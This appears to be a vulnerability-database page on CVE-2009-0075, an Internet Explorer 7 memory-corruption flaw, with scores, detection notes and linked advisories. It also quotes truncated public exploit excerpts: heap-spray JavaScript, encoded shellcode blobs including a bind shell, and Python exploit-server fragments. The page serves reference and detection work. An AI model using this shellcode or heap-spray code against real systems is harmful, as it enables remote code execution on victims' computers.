CVE-2009-0075
Published: 2009-02-10
Priority P274 · critical · 9.3 (CVSS 2.0)
CVSS vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
ITW / EXPLOIT / VulnCheck KEV: Exploited in the wild
EPSS: 85.28% (99.7th percentile)
Microsoft Internet Explorer 7 does not properly handle errors during attempted access to deleted objects, which allows remote attackers to execute arbitrary code via a crafted HTML document, related to CFunctionPointer and the appending of document objects, aka "Uninitialized Memory Corruption Vulnerability."
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_explorer | — | — |
Detection & IOCs (extracted from sources)
Detection notes:
- The exploit delivers a crafted HTML page via HTTP containing a heap spray that uses the NOP sled value 0x0C0C0C0C (or 0x0D0D0D0D) and unescape() shellcode blobs; detect large repeated %u0c0c%u0c0c or %u0D0D%u0D0D patterns in HTTP responses targeting IE 7.
- Exploit HTML pages contain a characteristic JavaScript heap-spray pattern: allocating a large Array, computing a heap_chunk_size of 0x40000, and filling it with unescape() NOP sleds followed by shellcode; look for this combination in HTTP response bodies.
- The Metasploit module randomizes JS variable names but uses a fixed redirect pattern with a random alpha query string (?<rand_alpha_key>) before delivering the exploit page; the redirect URI pattern can be used for detection.
- The exploit targets CFunctionPointer uninitialized memory in IE 7 via crafted HTML; the vulnerability is triggered by appending document objects. Monitor for exploitation of the mshtml.dll CFunctionPointer code path in the IE 7 process.
- Bind-shell payload opens TCP port 5500 on the victim; monitor for unexpected listening services on port 5500 after IE 7 exploitation.
- Bind-shell payload opens TCP port 28876 on the victim; monitor for unexpected listening services on port 28876 after IE 7 exploitation.
- The Metasploit module uses 'migrate -f' as its InitialAutoRunScript post-exploitation; detect Meterpreter process migration immediately after iexplore.exe exploitation.
Caveats:
- The exploit is confirmed only against specific Internet Explorer 7 builds; the Metasploit module targets Windows XP SP2-SP3 and Windows Vista SP0 with IE 7 only.
- The PoC exploit (8152) was tested specifically on Internet Explorer 7.0.5730.11 on Windows XP SP2; reliability on other patch levels is not confirmed.
- The Metasploit module notes there is no way to fingerprint the target before attempting exploitation (no vuln_test), meaning the exploit is fired blindly at any connecting client.
CVSS provenance
- NVD (CVSS v2.0): 9.3 CRITICAL, AV:N/AC:M/Au:N/C:C/I:C/A:C
- VulnCheck: 9.3 CRITICAL
GHSA
GHSA-wmm4-42gq-5r23: Safari on Apple iPhone OS 3
ghsa_unreviewed · 2022-05-02 · CVE-2010-1176 [CRITICAL] · CWE-94 · CVSS 9.3
Safari on Apple iPhone OS 3.1.3 for iPod touch allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors related to an array of long strings, an array of IMG elements with crafted strings in their SRC attributes, a TBODY element with no associated TABLE element, and certain calls to the delete operator and the cloneNode, clearAttributes, and CollectGarbage methods, possibly a related issue to CVE-2009-0075.
GHSA
GHSA-84pr-v9rf-j48h (CVE-2009-0075)
ghsa_unreviewed · 2022-05-02 · CVE-2009-0075 [HIGH]
Microsoft Internet Explorer 7 does not properly handle errors during attempted access to deleted objects, which allows remote attackers to execute arbitrary code via a crafted HTML document, related to CFunctionPointer and the appending of document objects, aka "Uninitialized Memory Corruption Vulnerability."
VulnCheck
Microsoft Internet Explorer 7 Uninitialized Memory Corruption Vulnerability
vulncheck · 2009 · CVE-2009-0075 [CRITICAL] · CVSS 9.3
Microsoft Internet Explorer 7 does not properly handle errors during attempted access to deleted objects, which allows remote attackers to execute arbitrary code via a crafted HTML document, related to CFunctionPointer and the appending of document objects, aka "Uninitialized Memory Corruption Vulnerability."
Affected: Microsoft Internet Explorer
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.virusbulletin.com/virusbulletin/2010/05/exploit-kit-explosion-part-two-vectors-attack/; https://unit42.paloaltonetworks.com/unit42-the-old-and-new-current-trends-in-web-based-thr
No detection rules found.
Exploit-DB
Microsoft Internet Explorer 7 - CFunctionPointer Uninitialized Memory Corruption (MS09-002) (Metasploit)
exploitdb · 2010-07-12 · CVE-2009-0075
---
```ruby
##
# $Id: ms09_002_memory_corruption.rb 9787 2010-07-12 02:51:50Z egypt $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 HttpClients::IE,
#       :ua_minver  => "7.0",
#       :ua_maxver  => "7.0",
#       :javascript => true,
#       :os_name    => OperatingSystems::WINDOWS,
#       :vuln_test  => nil, # no way to test without just trying it
#})
  include Msf::Exploit::Remote::HttpServer::HTML
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Internet Explo
```
Exploit-DB
Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)
exploitdb · 2009-03-04 · CVE-2009-0076
---
```python
#
# Author : Ahmed Obied ([email protected])
#
# - Based on the code found by str0ke in the wild for MS09-002
# - Tested using Internet Explorer 7.0.5730.11 on Windows XP SP2
#
# Usage : python ie_ms09002.py [port]
#
import sys, socket
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
class RequestHandler(BaseHTTPRequestHandler):
    def get_payload(self):
        # win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub
        # http://metasploit.com
        payload = '\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6f'
        payload += '\x02\xb1\x0e\x83\xeb\xfc\xe2\xf4\x93\xea\xf5\x0e\x6f\x02\x3a\x4b'
        payload += '\x53\x89\xcd\x0b\x17\x03\x5e\x85\x20\x1a\x3a\x51\x4f\x03\x5a\x47'
        payload += '\xe4\x36\x3a\x
```
Exploit-DB
Microsoft Internet Explorer 7 (Windows XP SP2) - Memory Corruption (MS09-002)
exploitdb · 2009-02-20 · CVE-2009-0076
---
```javascript
// Skyland win32 bindshell (28876/tcp) shellcode
// If you want an evil Shellcode go ahead !!!
var shellcode=unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031
```
Exploit-DB
Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (MS09-002)
exploitdb · 2009-02-20 · CVE-2009-0076
---
```javascript
var c=unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
var array = new Array();
var ls = 0xd00000;
var b = unescape("%u0c0c%u0c0c");
while(b.lengthwindow.setTimeout("ok();",800);
```
# milw0rm.com [2009-02-20]
Exploit-DB
Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)
exploitdb · 2009-02-20 · CVE-2009-0076
---
```python
#!/usr/bin/env python
###############################################################################
# MS Internet Explorer 7 Memory Corruption Exploit (MS09-002)                 #
###############################################################################
#                                                                             #
# Thanks to str0ke for finding this in the wild.                              #
#                                                                             #
# Tested on Windows 2003 SP2 R2                                               #
#                                                                             #
# Written by SecureState R&D Team (ReL1K)                                     #
# http://www.securestate.com                                                  #
#                                                                             #
# win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind #
#                                                                             #
###############################################################################
from BaseHTTPServer import HTTPServer
from BaseHTTPServer import BaseHTTPRequestHandler
import sys
try:
    import psyco
    psyco.full()
except ImportErro
```
Exploit-DB
Microsoft Internet Explorer 7 - Memory Corruption (PoC) (MS09-002)
exploitdb · 2009-02-18 · CVE-2009-0075
---
```javascript
var c="putyourshizhere-unescaped";
var array = new Array();
var ls = 0x100000-(c.length*2+0x01020);
var b = unescape("%u0C0C%u0C0C");
while(b.lengthwindow.setTimeout("ok();",800);
```
# milw0rm.com [2009-02-18]
Metasploit
MS09-002 Microsoft Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption
metasploit
This module exploits an error related to the CFunctionPointer function when attempting to access uninitialized memory. A remote attacker could exploit this vulnerability to corrupt memory and execute arbitrary code on the system with the privileges of the victim.
Unit42
## Web-Based Threats: First Half 2019
blogs_unit42 · 2019-11-01
Authors: Fang Liu, Tao Yan, Jin Chen, Rongbo Shao, Zhanglin He, Bo Qu
Published: November 1, 2019
Tags: Malware, Trend Reports, Vulnerabilities, ELink, Exploit Kits, Malicious Domains, Malicious URL, Phishing
### Executive Summary
Our Unit 42 research team routinely evaluates the data from our Email Link Analysis (ELINK) system. In examining the data we collect, which includes URLs extracted from emails or submitted by API, we can identify patterns and trends which help us discern prevalent web threats. This blog is the fifth installment in a series of posts tracking web-based threats over time, specifically statistics pertaining to malicious URLs, domains, exploit kits, vulnerabilities, and phishing scams.
We observed a significant decrease in the activity of the Fallout exploit kit in the first quarter of 2019 while at the same time observing an increase in activity of the Kaixin exploit kit in the second quarter. Kaixin is primarily observed hosted in China and with the increased popularit
Unit42
## Web-based Threats-2018 Q3: Malicious URLs and Domains take a Dip
blogs_unit42 · 2018-12-27 · CVE-2015-5119 [CRITICAL] · CVSS 9.8
Authors: Bo Qu, Tao Yan, Rongbo Shao, Zhanglin He, Xingyu Jin
Published: December 27, 2018
Tags: Malware, Trend Reports, Vulnerabilities, CVE-2015-5119, ELink
### Executive Summary
Our Email Link Analysis (ELINK) system is routinely reviewed by our Unit 42 research team. In examining the data it collects, patterns and trends are discovered which help us discern prevalent web threats. This blog is the third (3rd quarter of 2018) in a series of posts tracking web-based threats throughout the year, specifically statistics pertaining to malicious URLs, domains, exploit kits, and CVEs.
During Quarter 3 (Q3), July – September, a notable shift occurred with the malicious URL and domain data; there was a significant drop in the number of malicious URLs as well as a drop in malicious domains that will be discussed below. In addition, we will be covering an interesting malicious Flash SWF that exploits CVE-2015-5119.
### URLs
Based on our analysis of dat
Unit42
## Web-based Threats-2018 Q2: U.S. Remains #1 in Malicious Web Addresses, China Falls from #2 to #7
blogs_unit42 · 2018-09-05 · CVE-2018-8174 [HIGH] · CVSS 7.5
Authors: Bo Qu, Tao Yan, Rongbo Shao, Zhanglin He
Published: September 5, 2018
Tags: Malware, Trend Reports, Vulnerabilities, CVE-2018-8174, ELink
### Executive Summary
In Q2, the United States was number one for hosting malicious domains and exploit kits.
Unit 42 regularly analyzes statistical data from our Email Link Analysis (ELINK) to understand the patterns and trends in current web threats. This blog outlines our analysis for April – June (Q2) 2018 and follows up our previous blog analyzing web-based threats for January – March (Q1) 2018 that can be found here. We also provide detailed analysis of attacks against CVE-2018-8174 (a vulnerability we discuss below) using the Double Kill exploit.
What we found this quarter was that vulnerabilities under attack remained consistent, including very old vulnerabilities. One new vulnerability used in zero-day attacks did rocket to near the top of the list.
The United States remained the num
Unit42
## The Old and New: Current Trends in Web-based Threats
blogs_unit42 · 2018-06-20 · CVE-2014-6332 [CRITICAL] · CVSS 9.3
Authors: Tao Yan, Bo Qu, Zhanglin He, Rongbo Shao
Published: June 20, 2018
Tags: Malware, Trend Reports, Vulnerabilities, CVE-2014-6332, CVE-2016-0189, EK, Exploit kit, KaiXin, Rig, Sundown
### Summary
In this blog, Unit 42 is sharing analysis and statistics from our Email Link Analysis (ELINK) from the first quarter of 2018 and highlighting interesting findings of current web threats. We will first describe statistical information about CVEs, malicious URLs and Exploit Kits (EKs), then discuss the current life cycle of these web-based threats, and wrap up with two case studies about evolving EKs and a cryptocurrency miner.
### Statistics analysis
CVEs
In the first quarter of 2018, we found 1583 malicious URLs across 496 different domains. Attackers used at least 8 old and public vulnerabilities as shown in Figure 1. The Top 3 CVEs used are
1. CVE-2014-6332: exploited by 774 malicious URLs
2. CVE-2016-0189: exploited by 219 malicious URLs
3. CVE-2015-5122: exploited by 85 malici
References
- http://osvdb.org/51839
- http://www.securityfocus.com/bid/33627
- http://www.us-cert.gov/cas/techalerts/TA09-041A.html
- http://www.vupen.com/english/advisories/2009/0389
- http://www.zerodayinitiative.com/advisories/ZDI-09-011/
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-002
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6000
- https://www.exploit-db.com/exploits/8077
- https://www.exploit-db.com/exploits/8079
- https://www.exploit-db.com/exploits/8080
- https://www.exploit-db.com/exploits/8082